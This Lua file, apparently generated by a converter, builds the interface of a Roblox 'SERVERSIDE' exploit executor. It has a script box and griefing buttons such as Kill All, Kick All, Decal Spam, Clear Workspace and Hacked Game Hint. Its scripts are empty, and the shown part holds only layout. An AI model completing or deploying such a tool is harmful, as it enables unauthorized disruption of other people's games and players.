--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 150 | Scripts: 37 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.ScreenGui
G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


-- StarterGui.ScreenGui.LocalScript
G2L["2"] = Instance.new("LocalScript", G2L["1"]);



-- StarterGui.ScreenGui.LocalScript
G2L["3"] = Instance.new("LocalScript", G2L["1"]);



-- StarterGui.ScreenGui.Frame
G2L["4"] = Instance.new("Frame", G2L["1"]);
G2L["4"]["BorderSizePixel"] = 0;
G2L["4"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["4"]["Size"] = UDim2.new(0, 417, 0, 296);
G2L["4"]["Position"] = UDim2.new(0.2379, 0, 0.25628, 0);
G2L["4"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.LocalScript
G2L["5"] = Instance.new("LocalScript", G2L["4"]);



-- StarterGui.ScreenGui.Frame.Frame2
G2L["6"] = Instance.new("Frame", G2L["4"]);
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["6"]["Size"] = UDim2.new(0, 417, 0, 50);
G2L["6"]["Position"] = UDim2.new(0, 0, -0.00338, 0);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Name"] = [[Frame2]];


-- StarterGui.ScreenGui.Frame.Frame2.TextLabel
G2L["7"] = Instance.new("TextLabel", G2L["6"]);
G2L["7"]["TextWrapped"] = true;
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["TextSize"] = 14;
G2L["7"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["7"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["7"]["TextScaled"] = true;
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["7"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["BackgroundTransparency"] = 1;
G2L["7"]["Size"] = UDim2.new(0, 394, 0, 26);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Text"] = [[l0st SERVERSIDE]];
G2L["7"]["Position"] = UDim2.new(0.04317, 0, -0.02083, 0);


-- StarterGui.ScreenGui.Frame.Frame2.Frame
G2L["8"] = Instance.new("Frame", G2L["6"]);
G2L["8"]["BorderSizePixel"] = 0;
G2L["8"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["Size"] = UDim2.new(0, 430, 0, 11);
G2L["8"]["Position"] = UDim2.new(-0.01679, 0, -0.20833, 0);
G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Frame2.Frame
G2L["9"] = Instance.new("Frame", G2L["6"]);
G2L["9"]["BorderSizePixel"] = 0;
G2L["9"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["Size"] = UDim2.new(0, 408, 0, 6);
G2L["9"]["Position"] = UDim2.new(0.03357, 0, 0.54167, 0);
G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.TextBox
G2L["a"] = Instance.new("TextBox", G2L["4"]);
G2L["a"]["CursorPosition"] = -1;
G2L["a"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["a"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["TextWrapped"] = true;
G2L["a"]["TextSize"] = 14;
G2L["a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(59, 59, 59);
G2L["a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["a"]["BorderMode"] = Enum.BorderMode.Middle;
G2L["a"]["PlaceholderText"] = [[-- by l0stk1dd88]];
G2L["a"]["Size"] = UDim2.new(0, 390, 0, 186);
G2L["a"]["Position"] = UDim2.new(0.05036, 0, 0.13288, 0);
G2L["a"]["BorderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["Text"] = [[]];


-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
G2L["b"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
G2L["c"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextBox.Completor
G2L["d"] = Instance.new("LocalScript", G2L["a"]);
G2L["d"]["Name"] = [[Completor]];


-- StarterGui.ScreenGui.Frame.TextBox.UICorner
G2L["e"] = Instance.new("UICorner", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextBox.UIStroke
G2L["f"] = Instance.new("UIStroke", G2L["a"]);
G2L["f"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["f"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.ScriptHubFrame
G2L["10"] = Instance.new("ScrollingFrame", G2L["4"]);
G2L["10"]["Active"] = true;
G2L["10"]["ScrollingDirection"] = Enum.ScrollingDirection.Y;
G2L["10"]["BorderSizePixel"] = 0;
G2L["10"]["CanvasPosition"] = Vector2.new(0, 280);
G2L["10"]["BackgroundColor3"] = Color3.fromRGB(92, 92, 92);
G2L["10"]["Name"] = [[ScriptHubFrame]];
G2L["10"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["10"]["Size"] = UDim2.new(0, 98, 0, 319);
G2L["10"]["Position"] = UDim2.new(1.01439, 0, -0.03378, 0);
G2L["10"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["ScrollBarThickness"] = 3;


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.LocalScript
G2L["11"] = Instance.new("LocalScript", G2L["10"]);



-- StarterGui.ScreenGui.Frame.ScriptHubFrame.Stroke
G2L["12"] = Instance.new("LocalScript", G2L["10"]);
G2L["12"]["Name"] = [[Stroke]];


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.c00lgui
G2L["13"] = Instance.new("TextButton", G2L["10"]);
G2L["13"]["TextWrapped"] = true;
G2L["13"]["BorderSizePixel"] = 0;
G2L["13"]["TextSize"] = 14;
G2L["13"]["TextScaled"] = true;
G2L["13"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["13"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["13"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["13"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["13"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["13"]["Text"] = [[c00lgui]];
G2L["13"]["Name"] = [[c00lgui]];


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.polaria
G2L["14"] = Instance.new("TextButton", G2L["10"]);
G2L["14"]["TextWrapped"] = true;
G2L["14"]["BorderSizePixel"] = 0;
G2L["14"]["TextSize"] = 14;
G2L["14"]["TextScaled"] = true;
G2L["14"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["14"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["14"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["14"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["14"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["14"]["Text"] = [[Polaria]];
G2L["14"]["Name"] = [[polaria]];
G2L["14"]["Position"] = UDim2.new(0, 0, 0.11285, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hdadmin
G2L["15"] = Instance.new("TextButton", G2L["10"]);
G2L["15"]["TextWrapped"] = true;
G2L["15"]["BorderSizePixel"] = 0;
G2L["15"]["TextSize"] = 14;
G2L["15"]["TextScaled"] = true;
G2L["15"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["15"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["15"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["15"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["15"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["15"]["Text"] = [[HD Admin]];
G2L["15"]["Name"] = [[hdadmin]];
G2L["15"]["Position"] = UDim2.new(0, 0, 0.22571, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.killall
G2L["16"] = Instance.new("TextButton", G2L["10"]);
G2L["16"]["TextWrapped"] = true;
G2L["16"]["BorderSizePixel"] = 0;
G2L["16"]["TextSize"] = 14;
G2L["16"]["TextScaled"] = true;
G2L["16"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["16"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["16"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["16"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["16"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["16"]["Text"] = [[Kill All]];
G2L["16"]["Name"] = [[killall]];
G2L["16"]["Position"] = UDim2.new(0, 0, 0.33856, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.UIListLayout
G2L["17"] = Instance.new("UIListLayout", G2L["10"]);
G2L["17"]["Padding"] = UDim.new(0, 5);
G2L["17"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.1xgui
G2L["18"] = Instance.new("TextButton", G2L["10"]);
G2L["18"]["TextWrapped"] = true;
G2L["18"]["BorderSizePixel"] = 0;
G2L["18"]["TextSize"] = 14;
G2L["18"]["TextScaled"] = true;
G2L["18"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["18"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["18"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["18"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["18"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["18"]["Text"] = [[1x1x1x1 GUI]];
G2L["18"]["Name"] = [[1xgui]];
G2L["18"]["Position"] = UDim2.new(0, 0, 0.45141, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hint
G2L["19"] = Instance.new("TextButton", G2L["10"]);
G2L["19"]["TextWrapped"] = true;
G2L["19"]["BorderSizePixel"] = 0;
G2L["19"]["TextSize"] = 14;
G2L["19"]["TextScaled"] = true;
G2L["19"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["19"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["19"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["19"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["19"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["19"]["Text"] = [[Hacked Game Hint]];
G2L["19"]["Name"] = [[hint]];
G2L["19"]["Position"] = UDim2.new(0, 0, 0.56426, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.deletehints
G2L["1a"] = Instance.new("TextButton", G2L["10"]);
G2L["1a"]["TextWrapped"] = true;
G2L["1a"]["BorderSizePixel"] = 0;
G2L["1a"]["TextSize"] = 14;
G2L["1a"]["TextScaled"] = true;
G2L["1a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1a"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["Text"] = [[Delete Hints]];
G2L["1a"]["Name"] = [[deletehints]];
G2L["1a"]["Position"] = UDim2.new(0, 0, 0.67712, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.playmusic
G2L["1b"] = Instance.new("TextButton", G2L["10"]);
G2L["1b"]["TextWrapped"] = true;
G2L["1b"]["BorderSizePixel"] = 0;
G2L["1b"]["TextSize"] = 14;
G2L["1b"]["TextScaled"] = true;
G2L["1b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1b"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1b"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1b"]["Text"] = [[Play spooky scary skeletons]];
G2L["1b"]["Name"] = [[playmusic]];
G2L["1b"]["Position"] = UDim2.new(0, 0, 0.78997, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.setskybox
G2L["1c"] = Instance.new("TextButton", G2L["10"]);
G2L["1c"]["TextWrapped"] = true;
G2L["1c"]["BorderSizePixel"] = 0;
G2L["1c"]["TextSize"] = 14;
G2L["1c"]["TextScaled"] = true;
G2L["1c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1c"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1c"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1c"]["Text"] = [[Set Skybox]];
G2L["1c"]["Name"] = [[setskybox]];
G2L["1c"]["Position"] = UDim2.new(0, 0, 0.90282, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.fixskybox
G2L["1d"] = Instance.new("TextButton", G2L["10"]);
G2L["1d"]["TextWrapped"] = true;
G2L["1d"]["BorderSizePixel"] = 0;
G2L["1d"]["TextSize"] = 14;
G2L["1d"]["TextScaled"] = true;
G2L["1d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1d"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1d"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1d"]["Text"] = [[Restore Skybox]];
G2L["1d"]["Name"] = [[fixskybox]];
G2L["1d"]["Position"] = UDim2.new(0, 0, 1.01567, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.decalspam
G2L["1e"] = Instance.new("TextButton", G2L["10"]);
G2L["1e"]["TextWrapped"] = true;
G2L["1e"]["BorderSizePixel"] = 0;
G2L["1e"]["TextSize"] = 14;
G2L["1e"]["TextScaled"] = true;
G2L["1e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1e"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1e"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1e"]["Text"] = [[Decal Spam]];
G2L["1e"]["Name"] = [[decalspam]];
G2L["1e"]["Position"] = UDim2.new(0, 0, 1.12853, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.flood
G2L["1f"] = Instance.new("TextButton", G2L["10"]);
G2L["1f"]["TextWrapped"] = true;
G2L["1f"]["BorderSizePixel"] = 0;
G2L["1f"]["TextSize"] = 14;
G2L["1f"]["TextScaled"] = true;
G2L["1f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1f"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1f"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1f"]["Text"] = [[Flood]];
G2L["1f"]["Name"] = [[flood]];
G2L["1f"]["Position"] = UDim2.new(0, 0, 1.24138, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.kickall
G2L["20"] = Instance.new("TextButton", G2L["10"]);
G2L["20"]["TextWrapped"] = true;
G2L["20"]["BorderSizePixel"] = 0;
G2L["20"]["TextSize"] = 14;
G2L["20"]["TextScaled"] = true;
G2L["20"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["20"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["20"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["20"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["20"]["Text"] = [[Kick All]];
G2L["20"]["Name"] = [[kickall]];
G2L["20"]["Position"] = UDim2.new(0, 0, 1.35423, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hackmessage
G2L["21"] = Instance.new("TextButton", G2L["10"]);
G2L["21"]["TextWrapped"] = true;
G2L["21"]["BorderSizePixel"] = 0;
G2L["21"]["TextSize"] = 14;
G2L["21"]["TextScaled"] = true;
G2L["21"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["21"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["21"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["21"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["21"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["21"]["Text"] = [[TextLabel Hack All]];
G2L["21"]["Name"] = [[hackmessage]];
G2L["21"]["Position"] = UDim2.new(0, 0, 1.46708, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.clearwater
G2L["22"] = Instance.new("TextButton", G2L["10"]);
G2L["22"]["TextWrapped"] = true;
G2L["22"]["BorderSizePixel"] = 0;
G2L["22"]["TextSize"] = 14;
G2L["22"]["TextScaled"] = true;
G2L["22"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["22"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["22"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["22"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["22"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["22"]["Text"] = [[Clear Terrain]];
G2L["22"]["Name"] = [[clearwater]];
G2L["22"]["Position"] = UDim2.new(0, 0, 1.57994, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.trollall
G2L["23"] = Instance.new("TextButton", G2L["10"]);
G2L["23"]["TextWrapped"] = true;
G2L["23"]["BorderSizePixel"] = 0;
G2L["23"]["TextSize"] = 14;
G2L["23"]["TextScaled"] = true;
G2L["23"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["23"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["23"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["23"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["23"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["23"]["Text"] = [[Troll All]];
G2L["23"]["Name"] = [[trollall]];
G2L["23"]["Position"] = UDim2.new(0, 0, 1.69279, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.atmosphere
G2L["24"] = Instance.new("TextButton", G2L["10"]);
G2L["24"]["TextWrapped"] = true;
G2L["24"]["BorderSizePixel"] = 0;
G2L["24"]["TextSize"] = 14;
G2L["24"]["TextScaled"] = true;
G2L["24"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["24"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["24"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["24"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["24"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["24"]["Text"] = [[Delete Atmosphere]];
G2L["24"]["Name"] = [[atmosphere]];
G2L["24"]["Position"] = UDim2.new(0, 0, 1.80564, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.deleteall
G2L["25"] = Instance.new("TextButton", G2L["10"]);
G2L["25"]["TextWrapped"] = true;
G2L["25"]["BorderSizePixel"] = 0;
G2L["25"]["TextSize"] = 14;
G2L["25"]["TextScaled"] = true;
G2L["25"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["25"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["25"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["25"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["25"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["25"]["Text"] = [[Clear Workspace]];
G2L["25"]["Name"] = [[deleteall]];
G2L["25"]["Position"] = UDim2.new(0, 0, 1.9185, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.killsound
G2L["26"] = Instance.new("TextButton", G2L["10"]);
G2L["26"]["TextWrapped"] = true;
G2L["26"]["BorderSizePixel"] = 0;
G2L["26"]["TextSize"] = 14;
G2L["26"]["TextScaled"] = true;
G2L["26"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["26"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["26"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["26"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["26"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["26"]["Text"] = [[Destroy All Sounds]];
G2L["26"]["Name"] = [[killsound]];
G2L["26"]["Position"] = UDim2.new(0, 0, 2.03135, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.destroydecal
G2L["27"] = Instance.new("TextButton", G2L["10"]);
G2L["27"]["TextWrapped"] = true;
G2L["27"]["BorderSizePixel"] = 0;
G2L["27"]["TextSize"] = 14;
G2L["27"]["TextScaled"] = true;
G2L["27"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["27"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["27"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["27"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["27"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["27"]["Text"] = [[Destroy All Decals]];
G2L["27"]["Name"] = [[destroydecal]];
G2L["27"]["Position"] = UDim2.new(0, 0, 2.1442, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hackmsg
G2L["28"] = Instance.new("TextButton", G2L["10"]);
G2L["28"]["TextWrapped"] = true;
G2L["28"]["BorderSizePixel"] = 0;
G2L["28"]["TextSize"] = 14;
G2L["28"]["TextScaled"] = true;
G2L["28"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["28"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["28"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["28"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["28"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["28"]["Text"] = [[Hack Message]];
G2L["28"]["Name"] = [[hackmsg]];
G2L["28"]["Position"] = UDim2.new(0, 0, 2.25705, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.tpall
G2L["29"] = Instance.new("TextButton", G2L["10"]);
G2L["29"]["TextWrapped"] = true;
G2L["29"]["BorderSizePixel"] = 0;
G2L["29"]["TextSize"] = 14;
G2L["29"]["TextScaled"] = true;
G2L["29"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["29"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["29"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["29"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["29"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["29"]["Text"] = [[Teleport All]];
G2L["29"]["Name"] = [[tpall]];
G2L["29"]["Position"] = UDim2.new(0, 0, 2.36991, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.timewarp
G2L["2a"] = Instance.new("TextButton", G2L["10"]);
G2L["2a"]["TextWrapped"] = true;
G2L["2a"]["BorderSizePixel"] = 0;
G2L["2a"]["TextSize"] = 14;
G2L["2a"]["TextScaled"] = true;
G2L["2a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2a"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["2a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2a"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["2a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2a"]["Text"] = [[Warp Time]];
G2L["2a"]["Name"] = [[timewarp]];
G2L["2a"]["Position"] = UDim2.new(0, 0, 2.48276, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.c00lkidd
G2L["2b"] = Instance.new("TextButton", G2L["10"]);
G2L["2b"]["TextWrapped"] = true;
G2L["2b"]["BorderSizePixel"] = 0;
G2L["2b"]["TextSize"] = 14;
G2L["2b"]["TextScaled"] = true;
G2L["2b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2b"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["2b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2b"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["2b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2b"]["Text"] = [[Forsaken c00lkidd]];
G2L["2b"]["Name"] = [[c00lkidd]];
G2L["2b"]["Position"] = UDim2.new(0, 0, 2.59561, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.billboardall
G2L["2c"] = Instance.new("TextButton", G2L["10"]);
G2L["2c"]["TextWrapped"] = true;
G2L["2c"]["BorderSizePixel"] = 0;
G2L["2c"]["TextSize"] = 14;
G2L["2c"]["TextScaled"] = true;
G2L["2c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2c"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["2c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2c"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["2c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2c"]["Text"] = [[BillBoard All]];
G2L["2c"]["Name"] = [[billboardall]];
G2L["2c"]["Position"] = UDim2.new(0, 0, 2.70846, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.music
G2L["2d"] = Instance.new("TextButton", G2L["10"]);
G2L["2d"]["TextWrapped"] = true;
G2L["2d"]["BorderSizePixel"] = 0;
G2L["2d"]["TextSize"] = 14;
G2L["2d"]["TextScaled"] = true;
G2L["2d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2d"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["2d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2d"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["2d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2d"]["Text"] = [[Troll Music]];
G2L["2d"]["Name"] = [[music]];
